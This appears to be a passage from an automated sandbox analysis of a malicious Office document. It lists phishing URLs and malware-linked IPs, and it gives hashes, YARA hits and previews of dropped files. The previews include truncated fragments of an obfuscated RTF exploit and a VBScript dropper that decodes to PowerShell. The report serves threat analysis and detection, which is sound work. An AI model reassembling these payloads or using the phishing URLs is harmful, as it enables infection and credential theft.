            http://a0988288.xsph.ru/yoyo334/yoyo322/adobe-home/login.html?log=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL&log2=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveLGet hashmaliciousUnknownBrowse
            • 104.17.246.203
            http://aletaxi.plGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            https://david-active534.pages.dev/Get hashmaliciousUnknownBrowse
            • 172.66.47.156
            http://taxiwlublinie.plGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            AMAZON-02USBestellijst.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            P02405912916 .xlsGet hashmaliciousAgentTeslaBrowse
            • 54.241.153.192
            https://cnn.compromisedblog.com/XMVFxNmNXUGF4TTFwRzI0c0ZBenZ0YVFnWFdTRWxZZWN6M3AzdHF0QW9hYXVnQmNjelFsQS9hMDJoL1dlT1lOaHJuMUo1VVFHZFNESnZXa0JSZkhjY2p6d3FvODE5R3NTQnNSWHZtejQwbFNDdDR6QjBsbElKWS8rZ3p1RVNGdFAwV0lrTkFsNm5sYTd3RVFDM1k1ZStkV25obEdXK0tHd1dhdHBDTzRKRGFmdWxJN3BvOHFDODRpUi80MVZLWkVmQ0F4UGVZek00dWhxSjVRN29hSnEtLTN6b0tnK2YrQU1JNXprdHItLW81dDhOZUVvQmw1MVpYeG0wKzFzN3c9PQ==?cid=2022767618Get hashmaliciousUnknownBrowse
            • 52.218.179.154
            https://layanan-pemulihan-akun-dana-resmi.program-update.com/Get hashmaliciousUnknownBrowse
            • 108.138.26.27
            https://mail.globaleuropeandasia.duckdns.org/home/login.php?MTcxNjgzMzI5M2Q2OTI0MDk5NDBlODRlODhjNGJkNjc1MDY0NjdkNjEwNDQ4YWVmN2ViNDYxYTJkNjE5NWYzYWM1MDM3ZGMxYTU4MTEyNTkwOA==Get hashmaliciousUnknownBrowse
            • 3.160.152.39
            L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 13.52.47.92
            BsQruPrJVe.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 52.16.208.95
            1M7tN5L38L.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 52.16.208.78
            bPnq1YMDrf.elfGet hashmaliciousMirai, OkiruBrowse
            • 52.26.63.251
            D8toi0qM9J.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 18.223.185.50
            AS-COLOCROSSINGUSP02405912916 .xlsGet hashmaliciousAgentTeslaBrowse
            • 192.227.225.180
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 198.46.177.156
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 192.3.109.164
            Swift_202411054785712.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 192.3.83.115
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 192.3.109.164
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 192.3.109.164
            Pvq4zSr7yY.elfGet hashmaliciousUnknownBrowse
            • 104.168.12.93
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 198.46.178.154
            https://www.brownfieldagnews.com/news/Get hashmaliciousUnknownBrowse
            • 23.95.182.29
            https://springs-citation-house-congressional.trycloudflare.com/win/print.exeGet hashmaliciousXmrigBrowse
            • 107.172.34.27
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            05af1f5ca1b87cc9cc9b25185115607dBestellijst.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 188.114.97.3
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            37SD8SH18I.docmGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
            • 188.114.97.3
            1080.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            7dcce5b76c8b17472d024758970a406bproduct Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            Bestellijst.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Shipping Documents.docGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 188.114.97.3
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Items.xlsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Roaming\rugtucw#20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
              Requirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                vns.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                  Doc606112.xlsGet hashmaliciousAgentTeslaBrowse
                    SWIFT26794306.xlam.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                      Enquiry#234342.xlam.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                        Profoma.xlsGet hashmaliciousAgentTeslaBrowse
                          Scan_doc000680092112202023130.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exeGet hashmaliciousAgentTeslaBrowse
                              e-Profile.jsGet hashmaliciousAgentTeslaBrowse
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):131072
                                Entropy (8bit):0.025598779265530825
                                Encrypted:false
                                SSDEEP:6:I3DPcNHvxggLRQ3whtH/tK4FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPWuw7H/DvYg3J/
                                MD5:E1EBBC491E520A12D9167CB09D886219
                                SHA1:2A67881B5511B4951635E18C6BB44E4E0ABAF582
                                SHA-256:E956E79A679AF35231E63C5DC56BB39EF807605D3C2460A5333E7E1AA5DC7855
                                SHA-512:AC56CE379C9777DEFCFD1BD67AD4C208F7D8B35EEE3F68C915B47DD10B321200B1C4725124EFE50CEAC4686E225454770E2955F55B04A1BEB08375FB54556EEF
                                Malicious:false
                                Preview:......M.eFy...z.r8...hI.%.:.F.*S,...X.F...Fa.q..................................ME.>r.4b.S............W..C.u.I........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4760
                                Entropy (8bit):4.834060479684549
                                Encrypted:false
                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                Malicious:false
                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.34726597513537405
                                Encrypted:false
                                SSDEEP:3:Nlll:Nll
                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                Malicious:false
                                Preview:@...e...........................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ISO-8859 text, with very long lines (1709), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):41774
                                Entropy (8bit):2.907735171911736
                                Encrypted:false
                                SSDEEP:768:WnBZRvw2F8y/eSJCDDHzqDHv0avr3eMIyPRRzhBPB2goE:Wn/Rvw2V/lkDbzqDH8aD3ePyPOE
                                MD5:4ABA9F34D75C755364C4918C2BC14004
                                SHA1:E44724CB1411CBE5A7100FF43E4A0AB666AD8DEA
                                SHA-256:6A717422A5D6A39E1D8EECFCB68D4AE2010104AC91A3A6A4B2DD68B5D9AA298C
                                SHA-512:3DF896966825EB32FF87A196A0B10379C533DF581335C04F219C883319DA4DBFE1AF101F720DFF56E40A47729D98B43488BBE0CC2ACE7C8F669295E0CEDD02CF
                                Malicious:true
                                Yara Hits:
                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:{\rt...{\*\fRightLine...399958069 \/}.{\409124668&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8*/|.<`&.:#(.41._+7%352|1)4?4^_@.<~..`*%@2/%?4+&6%9..??~2:?0?!*33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%14*8.-9$?#?4.^0-6]72?9@317*$|[3-):3?`57..!.&<-..8/@15]_|-+.88?3$?;5?/-,0)`*,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(|./`'0)6~`'%3*`.,%#==.'[?.!?50:%$,|$.=&`??%..8)532%9^~^*?#?64:3|-.^%#71...7$?_??@)9?=181$.<*;$/7,?-%28]=.~0408!][/8?22)[?;)|-).1*_+4.@`(+?+#>=]:.%4+0!!$*6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-|^.&3':??~?0?).9*@1#.&(~68*(@05;;:4~?^@#)'5][)#,6./'@[|6.)!%,_>:@..~%,$`?%|(*.2@3:%414^%^./#>!.%`$&_:9!#+;?*',63'*?`&?-.:>_<?+='?*2=59:[%0...?*|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[*.07;1^2]2[.46#.%;8?0`?/??(,?]7]?|6<;%;<-~].&.$%0*')^+.;24[+.[;53/@8_?|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?*2_16/1|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.|.11=
                                Process:C:\Windows\SysWOW64\wscript.exe
                                File Type:ASCII text, with very long lines (10839), with CRLF line terminators
                                Category:dropped
                                Size (bytes):12972
                                Entropy (8bit):4.5587993607138895
                                Encrypted:false
                                SSDEEP:384:/L/HcpV0PDNDbUIEGGZd+mCrGCCf3pUHrH+JARZmVpPgRUVNubZ:KV85XUIkZgdrGBf3pUHa6OVXYF
                                MD5:24EBCCF26C1A85D185C934638AE8D6F0
                                SHA1:19802527C6C2A4768B028411ACAFBEB47283739D
                                SHA-256:C9966E67875422656A3C5C3FA84BF3088C685639B73E21034A2EAD3297E5CB92
                                SHA-512:BEFF17B14812F3C3F8550649878EA389AE3C8279D90BDD7C8B66807F6A444A124508BBF43566FAC6AFADEDC7653CF592E9D25412620441A5B1FDB0445851CFF7
                                Malicious:false
                                Preview:.. dim erythrite , desmanivar , formalizar , bespa , escolhedeira , Cama , escolhedeira1.. desmanivar = " ".. formalizar = "" & bespa & desmanivar & bespa & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & bespa & desmanivar & bespa & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & bespa & desmanivar & bespa & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & bespa & desmanivar & bespa & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & bespa & desmanivar & bespa & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & bespa & desmanivar & bespa & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & bespa & desmanivar & bespa & "Dg
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):157620
                                Entropy (8bit):3.266773697155131
                                Encrypted:false
                                SSDEEP:1536:IKVd99CObiBKMcZGtaJK6nbsPhwW0/5JJ7i1cCsg0BRbUZlu9gISsRf:NVdMqJK67/Kczg0BRcY
                                MD5:2A72DDE2D0CAE1D60A1E9B1795350C62
                                SHA1:1AB2FEF7BD875D6A92CA83B77A26255DF2E10EAF
                                SHA-256:33FAFF24C68095E9ED702732BDDFE647E885533D37E6C1090CB19DA13C64A976
                                SHA-512:0EDB935A63E3ABA4D585143FD775C513157AAC397EDD81BD109BBEA6C7C3808627D24D7DA6D6F4E789572514A212F200F78750DE9564B094DD71AACF425C3132
                                Malicious:false
                                Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ISO-8859 text, with very long lines (1709), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):41774
                                Entropy (8bit):2.907735171911736
                                Encrypted:false
                                SSDEEP:768:WnBZRvw2F8y/eSJCDDHzqDHv0avr3eMIyPRRzhBPB2goE:Wn/Rvw2V/lkDbzqDH8aD3ePyPOE
                                MD5:4ABA9F34D75C755364C4918C2BC14004
                                SHA1:E44724CB1411CBE5A7100FF43E4A0AB666AD8DEA
                                SHA-256:6A717422A5D6A39E1D8EECFCB68D4AE2010104AC91A3A6A4B2DD68B5D9AA298C
                                SHA-512:3DF896966825EB32FF87A196A0B10379C533DF581335C04F219C883319DA4DBFE1AF101F720DFF56E40A47729D98B43488BBE0CC2ACE7C8F669295E0CEDD02CF
                                Malicious:true
                                Yara Hits:
                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.doc, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:{\rt...{\*\fRightLine...399958069 \/}.{\409124668&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8*/|.<`&.:#(.41._+7%352|1)4?4^_@.<~..`*%@2/%?4+&6%9..??~2:?0?!*33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%14*8.-9$?#?4.^0-6]72?9@317*$|[3-):3?`57..!.&<-..8/@15]_|-+.88?3$?;5?/-,0)`*,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(|./`'0)6~`'%3*`.,%#==.'[?.!?50:%$,|$.=&`??%..8)532%9^~^*?#?64:3|-.^%#71...7$?_??@)9?=181$.<*;$/7,?-%28]=.~0408!][/8?22)[?;)|-).1*_+4.@`(+?+#>=]:.%4+0!!$*6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-|^.&3':??~?0?).9*@1#.&(~68*(@05;;:4~?^@#)'5][)#,6./'@[|6.)!%,_>:@..~%,$`?%|(*.2@3:%414^%^./#>!.%`$&_:9!#+;?*',63'*?`&?-.:>_<?+='?*2=59:[%0...?*|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[*.07;1^2]2[.46#.%;8?0`?/??(,?]7]?|6<;%;<-~].&.$%0*')^+.;24[+.[;53/@8_?|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?*2_16/1|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.|.11=
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                Category:dropped
                                Size (bytes):27232148
                                Entropy (8bit):1.7083158701383003
                                Encrypted:false
                                SSDEEP:1536:/55bm5MAxhu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlcBQ3+3Zvaa:AkZu50yknG/qc+jBLm09zWwTCSD53Z3
                                MD5:832889B2276DD883EF0FD8585744271D
                                SHA1:FE930C09E0A1C2FABCBF4439EE1387EC89920CC6
                                SHA-256:10722AEB0AAA6ECA027855B024CED4247CBB30F9B133B357E0BB3A6A9C089FDC
                                SHA-512:4AAE1412BD0A77EE793FA7201327AEC4B4FC1DB6F4AB25455121C2E30CFEB3CF0D902CDCB736B81D21498FBF1BC0D7B73CEE04AE2EDA81ED26937C0D9F62E46D
                                Malicious:false
                                Preview:....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                Category:dropped
                                Size (bytes):20976
                                Entropy (8bit):3.1065219461309983
                                Encrypted:false
                                SSDEEP:192:37NloHL9bFKiIsQuCy5U90Gi5P4UMFOmm+1Yd2KUdA/uTcA/g:oL9fIZuCcT5P4UMomm0KUdA/uV/g
                                MD5:506B3FFFC1734CD7A3F323D191DAAF8F
                                SHA1:8A920A56AD60E4D0A580C031116990534B9AA8CB
                                SHA-256:AC38AE1023230428CC59B756DE5594C138A7784A5CCB88A6CA2128B866F51582
                                SHA-512:A04799C3B054C313ABE347D9E00E585BD3267D578F3FF7F45887C435694425BD853CEF38F82A61D73BE726B94BB37AEB8B23915D52C6A072C81ECA1146AFD25D
                                Malicious:false
                                Preview:....l...........7...............~@..!$.. EMF.....Q..........................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i.........................................................D................................2%.........d.........(.-.....0.-...............E.....(.-.....(.-.....0.-.....7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i......................................................................................................`.-.....X.-.....`.-...............E.....X.-.....X.-.....`.-.....7......................@.N..............C.a.l.i.b.r.i...........
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                Category:dropped
                                Size (bytes):27232148
                                Entropy (8bit):1.7083158701383003
                                Encrypted:false
                                SSDEEP:1536:/55bm5MAxhu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlcBQ3+3Zvaa:AkZu50yknG/qc+jBLm09zWwTCSD53Z3
                                MD5:832889B2276DD883EF0FD8585744271D
                                SHA1:FE930C09E0A1C2FABCBF4439EE1387EC89920CC6
                                SHA-256:10722AEB0AAA6ECA027855B024CED4247CBB30F9B133B357E0BB3A6A9C089FDC
                                SHA-512:4AAE1412BD0A77EE793FA7201327AEC4B4FC1DB6F4AB25455121C2E30CFEB3CF0D902CDCB736B81D21498FBF1BC0D7B73CEE04AE2EDA81ED26937C0D9F62E46D
                                Malicious:false
                                Preview:....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Composite Document File V2 Document, Cannot read section info
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):1.8393056853195393
                                Encrypted:false
                                SSDEEP:192:eZPtGoJcOA0ZMsf5httstP76JcOA0ZMsf5htts:OPERTcDf5/0PvTcDf5/
                                MD5:B272BA6168CB6280DA0484E65E14A563
                                SHA1:5A5DCF36161A635F4F76A5D56C8C60ED8817DE64
                                SHA-256:3BE7A5434A2833798DEA24D35CBF2BA2A02FABE1E772A603A57A2EDF0781FEFC
                                SHA-512:303E5323AB87E1A8FB804A002635E3C299A761851FA076880612AE34FA2647E37BFD2582E4BB92661F48751FC87379EA963412196671798010B8F0475DEDF9CE
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.3024364166071503
                                Encrypted:false
                                SSDEEP:96:UHH8TdZ6Q2+xEt6NrUTvxuKatCqfaWb/ex4AIRMatFkN9ydauuA:UH6dZ6Qut+rUzk5UgVy4AImaHkN05Z
                                MD5:A64E6004C8139DE04A7EE5F75E63EBA0
                                SHA1:E5DB8824A30DF0DC46A3FD4A63B57EE623D1AFF9
                                SHA-256:ED07DF0A5276E6F3DADA643E46515E6B411DEDBAE47BE9986E4BF75293569372
                                SHA-512:12588DC993FEDE84A1F205CD0EDB0A260E6014625E4E9A8F5606E49A96C1661CE537B68BD9055CB9D7DA5D40958F4B26ED7545809597253E528A2087C7024AD2
                                Malicious:false
                                Preview:..0.9.1.2.4.6.6.8.&.]./.3.....`.+.5.6.?.?.^.?.2.).4./._.~.6.!.,.?._.&.1./.&.6.].=.....9.:.3.].8.*./.|...<.`.&...:.#.(...4.1..._.+.7.%.3.5.2.|.1.).4.?.4.^._.@...<.~.....`.*.%.@.2./.%.?.4.+.&.6.%.9.....?.?.~.2.:.?.0.?.!.*.3.3...$.0.`.!.8.8.].?.3.0...!.?.?.<.[.?.%.$.(.$.<.?.3.,.?./...%.!./.4.2.5.?.0.%.).9.-.%.@./.1.1.~.?.?.6.0.%.1.4.*.8...-.9.$.?.#.?.4...^.0.-.6.].7.2.?.9.@.3.1.7.*.$.|.[.3.-.).:.3.?.`.5.7.....!...&.<.-.....8./.@.1.5.]._.|.-.+...8.8.?.3.$.?.;.5.?./.-.,.0.).`.*.,...+.@.1.!.!.<.&.&.3.%.(.(.2.1.~.6.%.:.7.?.-.?.?.(...#.!...5._.$.../.$.&.$.)...>.~.%.(.+.;.?.(.|.../.`.'.0.).6.~.`.'.%.3.*.`...,.%.#.=.=...'.[.?...!.?.5.0.:.%.$.,.|.$...=.&.`.?.?.%.....8.).5.3.2.%.9.^.~.^.*.?.#.?.6.4.:.3.|.-...^.%.#.7.1.......7.$.?._.?.?.@.).9.?.=.1.8.1.$...<.*.;.$./.7.,.?.-.%.2.8.].=...~.0.4.0.8.!.].[./.8.?.2.2.).[.?.;.).|.-.)...1.*._.+.4...@.`.(.+.?.+.#.>.=.].:...%.4.+.0.!.!.$.*.6.;.?.3.).1.+.?.&.).2.).2.].[...#.:.1.3.?.<.1.?.0.$.?.+.7.9./.%...8.'.'.~...1.!.>.@.-.|.^...&.3.'.:.?.?.~.?.0.?.)...9.*.
                                Process:C:\Windows\SysWOW64\explorer.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.7798653713156546
                                Encrypted:false
                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\explorer.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                Category:dropped
                                Size (bytes):20480
